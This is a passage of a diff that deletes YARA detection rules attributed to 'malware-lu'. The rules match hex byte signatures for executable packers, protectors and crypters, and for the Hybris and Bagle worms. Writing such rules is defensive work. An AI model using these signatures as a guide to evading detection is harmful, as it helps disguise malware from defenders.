-		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? 00 00 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule AHTeamEPProtector03fakekkryptor9kryptoraFEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 ?? ?? ?? ?? 5E B9 00 00 00 00 2B C0 02 04 0E D3 C0 49 79 F8 41 8D 7E 2C 33 46 ?? 66 B9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEBundlev310
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 20 40 00 87 DD ?? ?? ?? ?? 40 00 01 }
-
-condition:
-		$a0
-}
-	
-	
-rule NsPack34NorthStar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF 80 38 01 0F 84 42 02 00 00 C6 00 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PellesC280290EXEX86CRTLIB
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 83 EC ?? 83 EC ?? 53 56 57 89 65 E8 68 00 00 00 ?? E8 ?? ?? ?? ?? 59 A3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackV115V117Dllap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 80 7C 24 08 01 0F 85 ?? 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PellesC28x45xPelleOrinius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 83 EC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Thinstallv2460Jitit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 51 53 56 57 6A 00 6A 00 FF 15 F4 18 40 00 50 E8 87 FC FF FF 59 59 A1 94 1A 40 00 8B 40 10 03 05 90 1A 40 00 89 45 FC 8B 45 FC FF E0 5F 5E 5B C9 C3 00 00 00 76 0C 00 00 D4 0C 00 00 1E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110Engdulekxt
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BB D0 01 40 ?? BF ?? 10 40 ?? BE }
-	$a1 = { E8 01 00 00 00 ?? ?? E8 ?? 00 00 00 }
-	$a2 = { EB 01 ?? EB 02 ?? ?? ?? 80 ?? ?? 00 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
-}
-	
-	
-rule PECompactv2xx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule ASPackv10802AlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillo440SiliconRealmsToolworks
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 31 2E 31 2E 34 00 00 00 C2 E0 94 BE 93 FC DE C6 B6 24 83 F7 D2 A4 92 77 40 27 CF EB D8 6F 50 B4 B5 29 24 FA 45 08 04 52 D5 1B D2 8C 8A 1E 6E FF 8C 5F 42 89 F1 83 B1 27 C5 69 57 FC 55 0A DD 44 BE 2A 02 97 6B 65 15 AA 31 E9 28 7D 49 1B DF B5 5D 08 A8 BA A8 }
-
-condition:
-		$a0
-}
-	
-	
-rule Armadillov1xxv2xx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 53 8B 5D 08 56 8B 75 0C 57 8B 7D 10 85 F6 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule HACKSTOPv111c
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B4 30 CD 21 86 E0 3D ?? ?? 73 ?? B4 ?? CD 21 B0 ?? B4 4C CD 21 53 BB ?? ?? 5B EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXEStealth276UnregisteredWebtoolMaster
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB ?? 45 78 65 53 74 65 61 6C 74 68 20 56 32 20 53 68 61 72 65 77 61 72 65 20 }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner02LCCWin32DLLAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 53 56 57 83 7D 0C 01 75 05 E8 17 90 90 90 FF 75 10 FF 75 0C FF 75 08 A1 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CDSSSv10Beta1CyberDoomTeamX
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED CA 47 40 00 FF 74 24 20 E8 D3 03 00 00 0B C0 0F 84 13 03 00 00 89 85 B8 4E 40 00 66 8C D8 A8 04 74 0C C7 85 8C 4E 40 00 01 00 00 00 EB 12 64 A1 30 00 00 00 0F B6 40 02 0A C0 0F 85 E8 02 00 00 8D 85 F6 4C 40 00 50 FF B5 B8 4E 40 00 E8 FC 03 00 00 0B C0 0F 84 CE 02 00 00 E8 1E 03 00 00 89 85 90 4E 40 00 8D 85 03 4D 40 00 50 FF B5 B8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElockv041x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 66 8B C0 8D 24 24 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 50 8B FE 68 78 01 ?? ?? 59 EB 01 EB AC 54 E8 03 ?? ?? ?? 5C EB 08 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ZCodeWin32PEProtectorv101
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 12 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E9 FB FF FF FF C3 68 ?? ?? ?? ?? 64 FF 35 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ABCCryptor10byZloY
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 FF 64 24 F0 68 58 58 58 58 90 FF D4 50 8B 40 F2 05 B0 95 F6 95 0F 85 01 81 BB FF 68 ?? ?? ?? ?? BF 00 ?? ?? ?? B9 00 ?? ?? ?? 80 37 ?? 47 39 CF 75 F8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BF 00 ?? ?? ?? B9 00 ?? ?? ?? 80 37 ?? 47 39 CF 75 F8 }
-
-condition:
-		$a0
-}
-	
-	
-rule FSGv120EngdulekxtMicrosoftVisualC60
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SLVc0deProtectorv061SLV
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 }
-	$a1 = { EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD FF FF FF 38 E8 E3 FF FF FF 66 E8 0D 00 00 00 04 E8 E3 FF FF FF 70 E8 CB FF FF FF 69 E8 DD FF FF FF 58 E8 DD FF FF FF 69 E8 E3 FF FF FF 79 E8 BF FF FF FF 69 83 C4 40 E8 00 00 00 00 5D 81 ED 9D 11 40 00 8D 95 B4 11 40 00 E8 CB 2E 00 00 33 C0 F7 F0 69 8D B5 05 12 40 00 B9 5D 2E 00 00 8B FE AC }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule FSG131dulekxt
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE ?? ?? ?? 00 BF ?? ?? ?? 00 BB ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackV112V114aPlib043ap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF EB 0F FF ?? ?? ?? FF ?? ?? ?? D3 83 C4 ?? 83 C7 ?? 83 3C 37 00 75 EB }
-
-condition:
-		$a0
-}
-	
-	
-rule Crypter31SLESH
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 FF 64 24 F0 68 58 58 58 58 FF D4 50 8B 40 F2 05 B0 95 F6 95 0F 85 01 81 BB FF 68 }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner01VBOX43MTEAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakeBJFNT13emadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 03 3A 4D 3A 1E EB 02 CD 20 9C EB 02 CD 20 EB 02 CD 20 60 EB 02 C7 05 EB 02 CD 20 E8 03 00 00 00 E9 EB 04 58 40 50 C3 61 9D 1F EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FreeCryptor02build002GlOFF
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 33 D2 90 1E 68 1B ?? ?? ?? 0F A0 1F 8B 02 90 50 54 8F 02 90 90 8E 64 24 08 FF E2 58 50 33 D2 52 83 F8 01 9B 40 8A 10 89 14 24 90 D9 04 24 90 D9 FA D9 5C 24 FC 8B 5C 24 FC 81 F3 C2 FC 1D 1C 75 E3 74 01 62 FF D0 90 5A 33 C0 8B 54 24 08 90 64 8F 00 90 83 C2 08 52 5C 5A }
-
-condition:
-		$a0
-}
-	
-	
-rule PackItBitchV10archphase
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule nPackv11250BetaNEOx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 3D 04 ?? ?? ?? 00 75 05 E9 01 00 00 00 C3 E8 46 00 00 00 E8 73 00 00 00 B8 2E ?? ?? ?? 2B 05 08 ?? ?? ?? A3 00 ?? ?? ?? E8 9C 00 00 00 E8 04 02 00 00 E8 FB 06 00 00 E8 1B 06 00 00 A1 00 ?? ?? ?? C7 05 04 ?? ?? ?? 01 00 00 00 01 05 00 ?? ?? ?? FF 35 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UnpackedBSSFXArchivev19
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 1E 33 C0 50 B8 ?? ?? 8E D8 FA 8E D0 BC ?? ?? FB B8 ?? ?? CD 21 3C 03 73 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01VideoLanClientAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 83 EC 08 90 90 90 90 90 90 90 90 90 90 90 90 90 90 01 FF FF 01 01 01 00 01 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00 01 00 01 00 01 90 90 00 01 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01PECompact14Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 EB 06 68 90 90 90 90 C3 9C 60 E8 02 90 90 90 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01DxPack10Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 8B FD 81 ED 90 90 90 90 2B B9 00 00 00 00 81 EF 90 90 90 90 83 BD 90 90 90 90 90 0F 84 00 00 00 00 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Splice11byTw1stedL0gic
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 00 1A 40 00 E8 EE FF FF FF 00 00 00 00 00 00 30 00 00 00 40 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 01 00 00 00 ?? ?? ?? ?? ?? ?? 50 72 6F 6A 65 63 74 31 00 ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 06 00 00 00 AC 29 40 00 07 00 00 00 BC 28 40 00 07 00 00 00 74 28 40 00 07 00 00 00 2C 28 40 00 07 00 00 00 08 23 40 00 01 00 00 00 38 21 40 00 00 00 00 00 FF FF FF FF FF FF FF FF 00 00 00 00 8C 21 40 00 08 ?? 40 00 01 00 00 00 AC 19 40 00 00 00 00 00 00 00 00 00 00 00 00 00 AC 19 40 00 4F 00 43 00 50 00 00 00 E7 AF 58 2F 9A 4C 17 4D B7 A9 CA 3E 57 6F F7 76 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv140v145
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB C3 11 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillo300aSiliconRealmsToolworks
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NullsoftInstallSystemv20b4
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 10 53 55 56 57 C7 44 24 14 F0 91 40 00 33 ED C6 44 24 13 20 FF 15 2C 70 40 00 55 FF 15 88 72 40 00 BE 00 D4 42 00 BF 00 04 00 00 56 57 A3 60 6F 42 00 FF 15 C4 70 40 00 E8 9F FF FF FF 8B 1D 90 70 40 00 85 C0 75 21 68 FB 03 00 00 56 FF 15 60 71 40 00 }
-	$a1 = { 83 EC 14 83 64 24 04 00 53 55 56 57 C6 44 24 13 20 FF 15 30 70 40 00 BE 00 20 7A 00 BD 00 04 00 00 56 55 FF 15 C4 70 40 00 56 E8 7D 2B 00 00 8B 1D 8C 70 40 00 6A 00 56 FF D3 BF 80 92 79 00 56 57 E8 15 26 00 00 85 C0 75 38 68 F8 91 40 00 55 56 FF 15 60 71 }
-
-condition:
-		$a0 or $a1
-}
-	
-	
-rule PESHiELDv01bMTE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B9 1B 01 ?? ?? D1 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule BeRoEXEPackerV100BeRo
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BA ?? ?? ?? ?? 8D B2 ?? ?? ?? ?? 8B 46 ?? 85 C0 74 51 03 C2 8B 7E ?? 8B 1E 85 DB 75 02 8B DF 03 DA 03 FA 52 57 50 FF 15 ?? ?? ?? ?? 5F 5A 85 C0 74 2F 8B C8 8B 03 85 C0 74 22 0F BA F0 1F 72 04 8D 44 ?? ?? 51 52 57 50 51 FF 15 ?? ?? ?? ?? 5F 5A 59 85 C0 74 0B AB 83 C3 04 EB D8 83 C6 14 EB AA 61 C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule MSLRHv32aemadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 3D FF 0F 00 00 EB 01 68 EB 02 CD 20 EB 01 E8 76 1B EB 01 68 EB 02 CD 20 EB 01 E8 CC 66 B8 FE 00 74 04 75 02 EB 02 EB 01 81 66 E7 64 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SpecialEXEPaswordProtectorv101EngPavolCerven
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E 77 00 00 8D 95 C6 77 00 00 8D 8D FF 77 00 00 55 68 00 20 00 00 51 52 6A 00 FF 95 04 7A 00 00 5D 6A 00 FF 95 FC 79 00 00 8D 8D 60 78 00 00 8D 95 85 01 00 00 55 68 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv166
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 ?? 87 DD 8B 85 E6 90 40 ?? 01 85 33 90 40 ?? 66 C7 85 ?? 90 40 ?? 90 90 01 85 DA 90 40 ?? 01 85 DE 90 40 ?? 01 85 E2 90 40 ?? BB 5B 11 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv167
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 87 DD 8B 85 E6 90 40 01 85 33 90 40 66 C7 85 90 40 90 90 01 85 DA 90 40 01 85 DE 90 40 01 85 E2 90 40 BB 8B 11 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VIRUSIWormHybris
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 16 A8 54 ?? ?? 47 41 42 4C 4B 43 47 43 ?? ?? ?? ?? ?? ?? 52 49 53 ?? FC 68 4C 70 40 ?? FF 15 }
-
-condition:
-		$a0
-}
-	
-	
-rule GPInstallv50332
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 33 C9 51 51 51 51 51 51 51 53 56 57 B8 C4 1C 41 00 E8 6B 3E FF FF 33 C0 55 68 76 20 41 00 64 FF 30 64 89 20 BA A0 47 41 00 33 C0 E8 31 0A FF FF 33 D2 A1 A0 }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner02PEIntro10Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B 04 24 9C 60 E8 14 00 00 00 5D 81 ED 0A 45 40 90 80 BD 67 44 40 90 90 0F 85 48 FF ED 0A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov410SiliconRealmsToolworks
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 F8 8E 4C 00 68 D0 EA 49 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 88 31 4C 00 33 D2 8A D4 89 15 7C A5 4C 00 8B C8 81 E1 FF 00 00 00 89 0D 78 A5 4C 00 C1 E1 08 03 CA 89 0D 74 A5 4C 00 C1 E8 10 A3 70 A5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AverCryptor102betaos1r1s
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 0C 17 40 00 8B BD 33 18 40 00 8B 8D 3B 18 40 00 B8 51 18 40 00 03 C5 80 30 05 83 F9 00 74 71 81 7F 1C AB 00 00 00 75 62 8B 57 0C 03 95 37 18 40 00 33 C0 51 33 C9 66 B9 F7 00 66 83 F9 00 74 49 8B 57 0C 03 95 37 18 40 00 8B 85 3F 18 40 00 83 F8 02 75 06 81 C2 00 02 00 00 51 8B 4F 10 83 F8 02 75 06 81 E9 00 02 00 00 57 BF C8 00 00 00 8B F1 E8 27 00 00 00 8B C8 5F B8 51 18 40 00 03 C5 E8 24 00 00 00 59 49 EB B1 59 83 C7 28 49 EB 8A 8B 85 2F 18 40 00 89 44 24 1C 61 FF E0 56 57 4F F7 D7 23 F7 8B C6 5F 5E C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv131
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 BB ?? ?? ?? ?? B2 80 A4 B6 80 FF D3 73 F9 33 C9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv133
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule HidePE101BGCorp
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BA ?? ?? ?? 00 B8 ?? ?? ?? ?? 89 02 83 C2 04 B8 ?? ?? ?? ?? 89 02 83 C2 04 B8 ?? ?? ?? ?? 89 02 83 C2 F8 FF E2 0D 0A 2D 3D 5B 20 48 69 64 65 50 45 20 62 79 20 42 47 43 6F 72 70 20 5D 3D 2D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXEStealthv11
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED FB 1D 40 00 B9 7B 09 00 00 8B F7 AC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Thinstallvxx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 EF BE AD DE 50 6A ?? FF 15 10 19 40 ?? E9 AD FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidium1200ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 ?? ?? E8 3F 1E 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PrivatePersonalPackerPPP103ConquestOfTroycom
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 19 00 00 00 90 90 E8 68 00 00 00 FF 35 2C 37 00 10 E8 ED 01 00 00 6A 00 E8 2E 04 00 00 E8 41 04 00 00 A3 74 37 00 10 6A 64 E8 5F 04 00 00 E8 30 04 00 00 A3 78 37 00 10 6A 64 E8 4E 04 00 00 E8 1F 04 00 00 A3 7C 37 00 10 A1 74 37 00 10 8B 1D 78 37 00 10 2B D8 8B 0D 7C 37 00 10 2B C8 83 FB 64 73 0F 81 F9 C8 00 00 00 73 07 6A 00 E8 D9 03 00 00 C3 6A 0A 6A 07 6A 00 E8 D3 03 00 00 A3 20 37 00 10 50 6A 00 E8 DE 03 00 00 A3 24 37 00 10 FF 35 20 37 00 10 6A 00 E8 EA 03 00 00 A3 30 37 00 10 FF 35 24 37 00 10 E8 C2 03 00 00 A3 28 37 00 10 8B 0D 30 37 00 10 8B 3D 28 37 00 10 EB 09 49 C0 04 39 55 80 34 39 24 0B C9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VIRUSIWormBagle
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6A 00 E8 95 01 00 00 E8 9F E6 FF FF 83 3D 03 50 40 00 00 75 14 68 C8 AF 00 00 E8 01 E1 FF FF 05 88 13 00 00 A3 03 50 40 00 68 5C 57 40 00 68 F6 30 40 00 FF 35 03 50 40 00 E8 B0 EA FF FF E8 3A FC FF FF 83 3D 54 57 40 00 00 74 05 E8 F3 FA FF FF 68 E8 03 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule RLPackv118BasicLZMAAp0x
-{
-      meta:
-		author="malware-lu"
-strings:
